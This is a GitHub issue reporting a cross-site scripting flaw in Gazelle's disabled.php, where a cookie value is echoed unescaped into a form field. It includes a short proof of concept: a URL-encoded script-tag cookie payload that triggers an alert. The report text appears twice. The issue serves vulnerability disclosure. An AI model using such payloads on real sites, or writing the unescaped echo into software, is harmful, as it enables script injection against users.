Open xjzzzxx opened 1 month ago
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php
... <form action="" method="POST"> <input type="email" class="inputtext" placeholder="Email Address" name="email" required /> <input type="submit" value="Submit" /> <input type="hidden" name="username" value="<?=$_COOKIE['username']?>" /> // Line 25 </form><br /><br /> ...
Source from $_COOKIE['username'] without any filtering or checking which resulting in XSS.
$_COOKIE['username']
GET sections/login/disabled.php
With the Cookie
username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
BTW,cms.gazelle.com in local(changes hosts)
Pretty deep space vulnerability that one but good demonstration.
Hello,
I would like to report for a XSS vulnerability in gazelle commit 63b3370
In file https://github.com/WhatCD/Gazelle/blob/master/sections/login/disabled.php
Source from
$_COOKIE['username']
without any filtering or checking which resulting in XSS.Poc
GET sections/login/disabled.php
With the Cookie
username=%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
Manual verification
BTW,cms.gazelle.com in local(changes hosts)